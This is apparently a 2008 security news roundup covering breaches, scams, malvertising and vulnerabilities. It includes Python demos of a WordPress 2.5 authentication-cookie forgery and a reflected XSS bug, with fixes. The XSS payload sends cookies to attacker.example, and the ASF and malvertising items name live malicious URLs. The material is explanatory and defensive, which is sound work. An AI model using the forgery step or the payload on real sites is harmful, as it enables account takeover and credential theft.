On April 11th hackers breached the computer system used by University of Massachusetts Amherst’s Health Services, potentially gaining access to thousands of medical records. After an initial investigation of the remote intrusion, the University decided to shut down the network. Though many of the most personal medical records are kept on paper files, officials say some personal information is available on the 150 computers used by the department.
More than half of UMass Amherst’s students are patients of record at University Health Services. According to the UMass Amherst web site, the school had an enrollment of 25,593 undergraduate and graduate students in the fall of 2006, so the breach could touch many thousands of people.
Even more unsettling, many patients were still unaware of the breach more than a week after it occurred. The University did post a notice on the Health Services website, and it is notifying patients when they enter the clinic.
The University has launched a detailed evaluation of the incident to find out whether any of the files were accessed during the intrusion, and will keep the community advised of its findings. Campus officials say it will be weeks before they are sure what information, if any, was taken off the computers. Officials believe the intruders wanted to use the server to host pirated music and video downloads, with the University’s machine hiding the culprits’ own identity.
The workstations in question contained limited patient information. To date, about 30 workstations have been returned to service and officials project that the entire network will be operating within the next week. According to campus officials, the entire campus system is being looked at to avoid future breaches.
According to a Justice Department press release, a Nigerian man was sentenced to 18 months in prison after tricking a NASA employee into clicking on an email attachment that installed malware on her government-issued computer. The unnamed Washington-based employee received the email from an individual she had met on an online dating site. As a result, her computer passwords, bank account numbers, social security number, driver’s license information and address were all disclosed.
NASA’s Office of Inspector General (OIG) began investigating the breach in December 2006 and quickly traced the attacker to Nigeria. A joint investigative team comprising Nigeria’s Economic and Financial Crime Commission (EFCC), US Attorneys in Washington and New York and the OIG’s computer crimes division convened an undercover operation that eventually led to 27-year-old Akeem Adejumo, who according to a court document also went by the name of Stephen Williams. Adejumo pleaded guilty to two counts of obtaining goods by false pretenses and forgery and was sentenced to 18 months in prison by the Lagos State High Court in Nigeria.
It’s important to note that this breach never would have happened without the cooperation of one very gullible (and likely delinquent) NASA employee. There’s no word whether she has been fired or disciplined, or whether NASA has taken steps to prevent similar episodes from happening again.
WordPress is prone to a vulnerability that lets an attacker forge authentication cookies. An attacker who can register a specially crafted username on a WordPress installation can generate valid authentication cookies for other accounts of their choosing, including the admin account. If a WordPress blog is configured to freely permit account creation, a remote attacker can gain WordPress-administrator access and then elevate this to arbitrary code execution as the web server user.
The root cause is that the cookie’s integrity check (an HMAC) is computed over the username and the expiry timestamp concatenated with no separator, so the boundary between the two fields is not authenticated. An attacker registers an unprivileged account whose username is “admin” followed by digits, logs in, and then rewrites the returned cookie so that those digits move from the username into the expiry field: the HMAC input is unchanged, but the cookie now names the administrator account.
Successfully exploiting this issue will compromise the affected application. Attackers can use a browser to exploit this issue.
Versions prior to WordPress 2.5.1 are vulnerable.
Solutions:
1. Upgrade to WordPress 2.5.1
2. De-select “Anyone can register” in the Membership section of “General Settings” to disable new account creation.
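To make the cookie flaw concrete, here is a small Python model of the scheme, written for this post and not taken from WordPress: the cookie is username|expiry|mac, the vulnerable variant computes the MAC over username and expiry with no separator (as 2.5 did), and the fixed variant inserts the “|” into the MAC input (as 2.5.1 does). The secret key, the user list and the attacker’s “admin0” account are constructed for the demo.

```python
import hashlib
import hmac
import time

# Constructed demo secret; WordPress derives its key from the site's salts.
SECRET = b"demo-secret-for-this-post-only"


def _mac(username, expiration, separator):
    # separator == "":  MAC("admin0" + "1234567890") == MAC("admin" + "01234567890")  (2.5)
    # separator == "|": the field boundary is part of the authenticated input     (2.5.1)
    msg = f"{username}{separator}{expiration}".encode()
    return hmac.new(SECRET, msg, hashlib.md5).hexdigest()


def issue_cookie(username, expiration, separator=""):
    """Cookie the server hands out after login: username|expiration|mac."""
    return f"{username}|{expiration}|{_mac(username, expiration, separator)}"


def validate_cookie(cookie, known_users, separator="", now=None):
    """Return the authenticated username, or None if the cookie is rejected."""
    parts = cookie.split("|")
    if len(parts) != 3:
        return None
    username, expiration, mac = parts
    if username not in known_users or not expiration.isdigit():
        return None
    if int(expiration) < (time.time() if now is None else now):
        return None
    # The MAC is recomputed from the fields as received, so a leading "0" in the
    # expiry string is part of the input exactly as it was when it sat in the username.
    if not hmac.compare_digest(mac, _mac(username, expiration, separator)):
        return None
    return username


def forge_admin_cookie(own_cookie):
    """Attack step: the attacker registered 'admin' followed by digits; moving those
    digits into the expiry field leaves the unseparated MAC input unchanged."""
    username, expiration, mac = own_cookie.split("|")
    suffix = username[len("admin"):]
    if not (username.startswith("admin") and suffix.isdigit()):
        raise ValueError("need a username of the form admin<digits>")
    return f"admin|{suffix}{expiration}|{mac}"


if __name__ == "__main__":
    users = {"admin", "admin0"}      # constructed: the target account and the attacker's
    now = 1_200_000_000              # fixed clock so the run is repeatable
    mine = issue_cookie("admin0", 1_234_567_890)
    print("2.5   :", validate_cookie(forge_admin_cookie(mine), users, now=now))       # admin
    mine = issue_cookie("admin0", 1_234_567_890, separator="|")
    print("2.5.1 :", validate_cookie(forge_admin_cookie(mine), users, "|", now))      # None
```

The fix is not a bigger hash or a secret rotation; it is making the MAC input unambiguous. Any scheme that MACs a concatenation of variable-length fields needs a delimiter or length prefix, or the same trick applies.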
Microsoft has reportedly developed a USB key that allows investigators to extract forensic data from PCs. The tool, called COFEE (Computer Online Forensic Evidence Extractor), comes in a USB key form factor and was distributed to a small number of law-enforcement agencies last June. The device bundles about 150 tools that let investigators extract internet history files and “decrypt passwords”. COFEE also allows investigators to upload data for analysis.
The device is used by more than 2,000 officers in at least 15 countries, including Germany and the US. Microsoft supplies the technology to law enforcement agencies without charge. The tool reportedly allows investigators to scan for evidence on site without necessarily having to cart PCs back to a lab.
Computer forensics is a painstaking process carefully designed to make sure data on a suspect computer isn’t changed; plugging a device into a running machine and pulling data off it alters the state of that machine, and looks like a quick and dirty fix. The admissibility of such data in court is debatable even before we get into the possibility that the USB key might carry malware.
The extraction and analysis of digital evidence features in the investigation of more and more crimes, not just those specific to computers such as internet fraud and child abuse investigations. UK specialists say they’re struggling to cope with the volume of work from law enforcement clients. There’s a genuine problem here, but we’re not convinced COFEE is the solution.
Ironically, COFEE cannot help investigators when the suspect’s PC runs Windows Vista with BitLocker enabled: it cannot decrypt files protected by BitLocker.
The University of Colorado at Boulder announced Friday that three computers in the Division of Continuing Education and Professional Studies were compromised, leaving nearly 10,000 people open to potential identity theft. Officials say students and instructors who were involved in the Division of Continuing Education and Professional Studies between 1997 and 2003 were affected.
On Thursday, CU Boulder IT security investigators discovered a malicious file on the computers and began analyzing log files to determine the extent of the exposure and whether any information was accessed. Investigators are still trying to determine the intent of the malicious file and whether it allowed the perpetrator to gain access to any private data.
Bronson Hilliard, a spokesman for CU-Boulder, says one of the three computers had personal data, including names, Social Security numbers, addresses and grades, of about 9,000 students and about 500 instructors.
The university is deeply troubled that this compromise occurred despite efforts under way across campus to address computer security. They do not believe the data has been accessed, but CU is in the process of contacting the affected students and instructors by mail. CU says a computer forensics firm has been hired to conduct an analysis.
Russ McRee, a security consultant at HolisticInfoSec, has documented cross-site scripting (XSS) flaws in five sites that prominently carry a valid logo declaring them to be Hacker Safe. As McRee documented in a blog post and accompanying video, the bugs make it possible for attackers to steal authentication credentials and redirect visitors to malicious websites. This comes more than three months after security bugs were documented in more than 60 e-commerce sites certified by McAfee as “Hacker Safe”.
All five of the sites subscribe to McAfee’s HackerSafe certification service, which audits the security of websites on a daily basis to give visitors confidence they’ll be safe when doing business there. Yet McRee was able to find the bugs by using advanced Google searches to pinpoint vulnerable web applications, and in at least one case, the XSS vulnerability has been on the customer’s site since January.
The five vulnerable sites include Alsto.com, Delexpress.hudsonltd.net, BlueFly.com, ImprovementsCatalog.com and DelightfulDeliveries.com. These are only the latest Hacker Safe sites to be outed. In January, researchers from XSSed.com, documented 62 websites subscribing to the service that were vulnerable to XSS vulnerabilities. A Hacker Safe spokesman said at the time the bugs couldn’t be used to hack a server.
The vulnerabilities also raise the question of Payment Card Industry Data Security Standard (PCI DSS) compliance for businesses that process credit card payments: the standard requires web applications to be protected against XSS, so sites that contain XSS vulnerabilities almost certainly don’t comply, yet most of the sites continue to accept credit cards.
McAfee has had three months to fix the deficiencies of this program, but so far we see no evidence it has done so. McAfee representatives have not commented on McRee’s latest discovery.
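For readers who want to see what a reflected XSS bug on a “Hacker Safe” storefront actually looks like, here is an added Python example (not McRee’s code, nor anything from the listed sites): a search page that echoes the query unescaped, the same page with output encoding for the attribute and text contexts it writes into, and the cookie flag that keeps a stolen document.cookie from including the session token. The payload and the attacker.example host are constructed for the demo.

```python
from html import escape

# Constructed payload of the credential-stealing kind: it closes the attribute it lands in
# and loads an "image" from a placeholder attacker host with the victim's cookies in the URL.
PAYLOAD = "\"><script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_search_vulnerable(query):
    """Echoes the query into an attribute value and into the body without encoding."""
    return (
        '<form><input name="q" value="' + query + '"></form>'
        '<p>Results for ' + query + '</p>'
    )


def render_search_hardened(query):
    """Same page, with the query encoded for HTML attribute and text contexts."""
    safe = escape(query, quote=True)   # & < > " ' become entities, so the attribute cannot be closed
    return (
        '<form><input name="q" value="' + safe + '"></form>'
        '<p>Results for ' + safe + '</p>'
    )


def contains_injected_script(html):
    """Crude check for this demo only: the two templates above never emit a <script> tag themselves,
    so any <script in the output came from the query."""
    return "<script" in html.lower()


def session_cookie_header(name, value):
    """Set-Cookie line with HttpOnly and Secure, so a successful XSS still cannot read the token
    through document.cookie (it can still redirect the visitor, which encoding must prevent)."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    print("vulnerable page injects script:", contains_injected_script(render_search_vulnerable(PAYLOAD)))  # True
    print("hardened page injects script:  ", contains_injected_script(render_search_hardened(PAYLOAD)))    # False
    print(session_cookie_header("sid", "constructed-session-id"))
```

A daily scanner that misses this is scanning for the wrong thing; the bug is visible to anyone who types a quote and an angle bracket into the search box, which is roughly what McRee’s Google searches were finding.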
Consumer-focused spam filtering firm ClearMyMail says that more than half of the junk mail blocked by its service on Tuesday was Grand Theft Auto IV-related. The vast majority of the messages offer the chance to win a PS3 complete with the game.
Gamers desperate to get their mitts on Grand Theft Auto IV are being targeted in an opportunistic spyware scam. Spam emails offer prospective marks free entry to a draw offering a PlayStation 3 loaded with the much-anticipated game as a prize. In reality, these illicit emails are loaded with spyware designed to swipe personal financial information from compromised PCs.
Grand Theft Auto IV for the PS3 and the Xbox 360 was released today to delirium from avid gamers. But some potential buyers have been left disappointed as game stores have been unable to fulfill demand to the extent that even a minority of fans who pre-ordered the game have been left empty-handed. Spammers are seeking to exploit this disappointment with a carefully targeted spam scam.
“We are seeing unprecedented levels of spam in relation to the game; with more than half of the spam our service is blocking relating to Grand Theft Auto, most of which contain viruses and spyware,” said Dan Field, Managing Director of ClearMyMail. Field advised keen gamers to wait until they can legitimately purchase the game rather than fall victim to “opportunists” capitalizing on pent-up demand.
A new attack uses ASF files opened in Windows Media Player to launch Internet Explorer which will then prompt you to download a malicious executable file.
The Microsoft ASF file format (and some other formats) allows a file to carry a script stream: a sequence of simple commands, such as opening a URL, that Windows Media Player understands. The playing application that supports ASF is responsible for executing the script commands at the proper point in playback.
The malicious ASF file that was analyzed opened Internet Explorer with the URL pointing to www.fastmp3player.com/affiliates/772465/1/?embedded=false. This web site had a further 302 redirect to www.fastmp3player.com/affiliates/772465/1/PLAY_MP3.exe (both links are still working, do not click), which is some adware and is detected by 20 out of 32 AV programs on VirusTotal.
While this attack is not sophisticated at all (and there is no real exploit here, just a “feature”), one thing that is worrying is the fact that this can be used to launch a browser on machines which are not patched, through Windows Media Player. And this also works with the latest Windows Media Player on Vista.
It is possible to disable this “feature” in Windows Media Player by modifying certain registry keys:
Open HKEY_CURRENT_USER\SOFTWARE\Microsoft\MediaPlayer\Preferences
And change values to:
- PlayerScriptCommandsEnabled: 0 (disabled); disabled by default
- WebScriptCommandsEnabled: 0 (disabled); default is 1 (enabled)
- URLAndExitCommandsEnabled: 0 (disabled); default is 1 (enabled)
More information is available at http://support.microsoft.com/kb/320944. The keys might not exist, and be very careful when changing anything in the registry.
Given these attacks, we recommend disabling the script commands.
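The registry changes above as a script, added here and not from Microsoft’s KB article: it reads the three values under HKEY_CURRENT_USER, treats a missing key or value as not hardened (the player then falls back to its built-in default, which is 1 for two of the three), and only writes the REG_DWORD zeros when run with --apply. The decision logic is kept apart from the winreg calls so it can be checked on a non-Windows box; the --apply flag and the function names are this script’s own.

```python
"""Disable Windows Media Player script-command handling for the current user."""
import sys

WMP_PREFS = r"SOFTWARE\Microsoft\MediaPlayer\Preferences"   # relative to HKEY_CURRENT_USER

# Value name -> setting that disables the behaviour (all REG_DWORD)
HARDENED = {
    "PlayerScriptCommandsEnabled": 0,   # default is already 0
    "WebScriptCommandsEnabled": 0,      # default 1
    "URLAndExitCommandsEnabled": 0,     # default 1; this is the one the ASF attack relies on
}


def needed_changes(current):
    """current maps value name -> DWORD, or None when the value (or the whole key) is absent.
    An absent value counts as not hardened: nothing in the registry says 0, so WMP uses its
    built-in default."""
    return {name: want for name, want in HARDENED.items() if current.get(name) != want}


def read_current():
    """Read the three values; tolerate a missing key or missing values (Windows only)."""
    import winreg
    current = {name: None for name in HARDENED}
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, WMP_PREFS, 0, winreg.KEY_READ)
    except FileNotFoundError:
        return current
    with key:
        for name in HARDENED:
            try:
                current[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass
    return current


def apply_changes(changes, dry_run=True):
    """Write the changes as REG_DWORD, creating the key if needed; return a log of what was done."""
    if not changes:
        return []
    if dry_run:
        return [f"would set HKCU\\{WMP_PREFS}\\{name} = {value}" for name, value in changes.items()]
    import winreg
    key = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, WMP_PREFS, 0, winreg.KEY_SET_VALUE)
    with key:
        for name, value in changes.items():
            winreg.SetValueEx(key, name, 0, winreg.REG_DWORD, value)
    return [f"set HKCU\\{WMP_PREFS}\\{name} = {value}" for name, value in changes.items()]


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("this script reads and writes the Windows registry; run it on Windows")
    dry = "--apply" not in sys.argv            # default is a dry run
    log = apply_changes(needed_changes(read_current()), dry_run=dry)
    for line in log or ["already hardened"]:
        print(line)
```

Run it once without arguments to see what it would change, then with --apply. Since the values live under HKCU, each user profile on a shared machine needs the change; the KB article is the reference for the value names.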
Websites run by Radio Free Europe have been under a fierce cyber attack that coincided with coverage over the weekend of a rally organized by the Belarusian opposition.
The distributed denial of service (DDoS) attack initially targeted only the RFE’s Belarus service, which starting on Saturday was inundated with as many as 50,000 fake pings every second. On Monday, it continued to be affected. At least seven other RFE sites for Kosovo, Azerbaijan, Tatar-Bashkir, Farda, South Slavic, Russia and Tajikistan, were also attacked but have mostly been brought back online.
The primary target was the Belarus service, which on Saturday - the 22nd anniversary of the Chernobyl nuclear disaster - offered live coverage of a rally in which thousands of people protested the plight of uncompensated victims and a government decision to build a new nuclear plant. Other Belarusian websites were also hit, including the Minsk-based nongovernmental organization Charter 97. There is no solid evidence, but the Belarusian government might be behind the attacks.
While a state-sponsored attack isn’t outside the realm of possibility, there was no mention that it might be the grassroots work of Belarusian nationalists. Recent attacks against CNN.com were the work of Chinese hacktivists who downloaded and installed DDoS tools as a way of registering their displeasure with the news site’s coverage of demonstrations against the Olympic torch relay.
Attacks such as these were also waged last year against Estonia and are sometimes called “asymmetric” because a relatively small group of individuals with modest means is able to hobble a much bigger target. It’s not hard to imagine that something similar is afoot in Belarus.
Regardless of who is behind the attacks, the result is the same: the protest coverage is being disrupted.
Over the past few days, Yahoo has been exposing visitors to fraudware banner ads and also ads that try to trick them into installing malware. The ads are displayed across numerous web portal sections, including Yahoo Mail, Yahoo Groups and Yahoo Astrology.
Some of the ads pitch women’s deodorant, but behind the scenes, they contact servers that have been used by previous rogue ads targeting high-traffic websites. Typically, the ads produce a pop up that looks strikingly similar to official Windows dialog pop-ups that urge the end user to download software to fix problems. Expedia, Rhapsody, MySpace, Excite, Blick, and CNN.com have all served up similar malicious ads in the past.
Attackers who inject their banners onto reputable sites usually take advantage of the highly decentralized way online advertisements are sold. It’s not unusual for an ad to pass through a succession of affiliates, which makes it possible for an attacker to pose as an authorized agent of a name-brand product or service. In this case, Yahoo has been deceived into running ads that point to adtds2.promoplexer.com, which has been implicated in previous rogue banner attacks. Even if you don’t get redirected, the malvertisement still lets the bad guys know it is on display by sending a beacon to adtds2.promoplexer.com/statsa.php?campaign=yahoo and adsraise.com/mbuyers/statistics.html
Other URLs in the redirection chain include:
eur.a1.yimg.com/java.europe.yimg.com/eu/any/yahoonew300×250.swf
ope.yahoo.com/eu/any/yahoonew728×90.swf
track.trackads.net/statsa.php?campaign=yahoo
Other sites that use Yahoo advertising (like eBay) could also expose visitors to the malvertisement and fraudware sites.
Emails have been sent to three different Yahoo PR reps, but so far there’s no indication anyone at the company is even aware of the problem.
A simple and effective way to avoid this kind of malware is the NoScript extension for Firefox. Even if you’ve whitelisted Yahoo, it will still block JavaScript and Adobe Flash served from the attacker’s domain, because the whitelist is per site rather than per page.
Update (May 3): After five days, Yahoo has finally removed the infected ads and redirections mentioned above.
The theft of a laptop computer owned by an accounting firm has made nearly 500 employees of Coos County and private organizations concerned about identity theft. County officials worry the data may have contained employees’ names, Social Security numbers and other personal information, which had been used in recent audits performed by Hough, MacAdam & Wartnik LLC of North Bend.
According to a Coos Bay Police press log, at approximately 7:28 a.m. on March 5, officers received a report of a woman flagging down Officer Tony Wetmore, identified as 122 in the log, near Coos Bay City Hall. Crystal Albiar, 30, told Wetmore a laptop computer had been stolen from a vehicle, which, Wetmore said, belonged to Albiar. The victim is listed on the press log as Hough, MacAdam & Wartnik. Albiar is a senior accountant at the firm.
Later that day, a letter from the company was sent to clients stating that a serious data security incident may have involved clients’ personal information.
So far there have been no known reports of identity theft from any of the 482 employees notified. The computer has not been found and, according to a letter from the firm, thieves sometimes hold victims’ information for later use.
The CPA firm said the computer was password protected, as were certain files, and that some of the information stored in its software requires “special knowledge in order to find the personal information inside of the program”. Neither is much comfort: a login password does not encrypt the disk, so anyone holding the laptop can read its files from another machine unless full-disk encryption was in use.
SwimwearBoutique.com (SWB) recently reported that criminals gained unauthorized access to customers’ personal information stored in SWB online accounts. The unlawful access occurred between March 26, 2008 and March 28, 2008. The information accessed varied and included the name, address, email address, SWB account password, and credit card account number of approximately 37 New Hampshire residents who were SWB customers. That account passwords could be read at all suggests they were stored in plaintext or in a reversible form rather than hashed. The criminals also corrupted data maintained by SWB, rendering certain data unreadable and unusable.
The crime was reported to the Dallas office of the United States Secret Service, which is assisting with the investigation. SWB also worked with its existing Internet security provider, McAfee, to determine how the criminals gained access to this information and immediately implemented measures to counter such unlawful conduct.
Notification letters were sent out on April 23, 2008, and affected customers can call 1-866-SWIMWEAR for more information.